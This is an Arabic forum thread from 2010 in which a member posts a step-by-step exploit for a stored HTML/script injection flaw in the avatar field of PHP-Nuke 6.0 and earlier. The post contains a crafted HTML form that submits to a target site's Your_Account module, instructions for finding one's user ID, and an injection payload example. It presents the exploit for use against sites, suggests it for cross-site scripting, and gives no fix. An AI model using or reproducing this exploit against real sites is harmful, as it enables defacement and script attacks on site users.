منتدى الشباب العربي

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

دخول

لقد نسيت كلمة السر



الان تصفح منتدانا باي لغة باللعالم

Browse 4-3rbshbaab.roo7.biz now in many languages


المواضيع الأخيرة
» صورة للشهيد محمد اسامة فروح
الخميس أكتوبر 11, 2012 3:11 am من طرف حموده

» البيان الرابع لواء احرار الشمال
الجمعة مارس 23, 2012 3:45 pm من طرف العميد

» البيان الثالث للواء احرا الشمال
الجمعة مارس 23, 2012 3:27 am من طرف العميد

» الرئيس الاسد في جولة تفقدية ((( نهفات الحماصنة )))
الخميس مارس 15, 2012 5:02 am من طرف العميد

» والد الشهيد محمد عباس يزف شهيده
الخميس مارس 15, 2012 4:17 am من طرف العميد

» الشهيد ابراهيم محمد عباس اول شهداء لواء احرار الشمال
الخميس مارس 15, 2012 4:15 am من طرف العميد

» اشتباكات اللواء في مدينة عزاز
الخميس مارس 15, 2012 4:10 am من طرف العميد

» البيان الثاني للواء احرار الشمال
الخميس مارس 15, 2012 4:06 am من طرف العميد

» البيان الاول للواء احرار الشمال
الخميس مارس 15, 2012 3:55 am من طرف العميد

اهلا بك معنااختر منطقتك الزمنية
كن احد المناصرين لنبيك واكسب الاجر

أهلا وسهلا بك زائرنا الكريم, أنت لم تقم بتسجيل الدخول بعد! يشرفنا أن تقوم بالدخول أو التسجيل إذا رغبت بالمشاركة في المنتدى

ثغرة في php nuke

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل  رسالة [صفحة 1 من اصل 1]

1f ثغرة في php nuke في الأحد ديسمبر 05, 2010 1:19 am

amer


عضو مثابر
عضو مثابر
فيه ثغره في ال php nuke حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان الصوره الشخصيه .......

انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!!

لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....

المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )

الاصدارات المصابه :

PHP Nuke versionh 6.0 و الاقل منها

الاستخدام :

تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه.



ملخص عام للثغره:

اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars ....

عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!

الاكسبلويت:

اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid

لازم تلاقي حاجه زي كده :

<input type="hidden" name="uid" value="2111">


كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ...

عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الى عنوان المجله الهدف ......:

<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">


<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>


<b>Username</b><input type="text" name="uname" size="30"

maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>



و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه :

">

و ممكن ينتهي بالعلامه

<b

حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!!

مثال للي ممكن تكتبه مثلا :

"><h1>TESTING</h1><b

طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!!

خلي بالك ان فيه مسافه بعد العلامه

"<b

خلي بالك منها والا سوف تجد بروكين كود ..

اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر ....

اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟

الحل :

لسه و الله !!!!

و السلام عليكم و رحمه الله و بركاته...

معاينة صفحة البيانات الشخصي للعضو

2f رد: ثغرة في php nuke في الأحد ديسمبر 05, 2010 11:46 pm

العميد

avatar
عضو متميز
عضو متميز
اتمنى من الله ان يوفق المسلمين فيما يحب ويرضا


_________________
الله محيي الجيش الحر

معاينة صفحة البيانات الشخصي للعضو

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة  رسالة [صفحة 1 من اصل 1]

صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى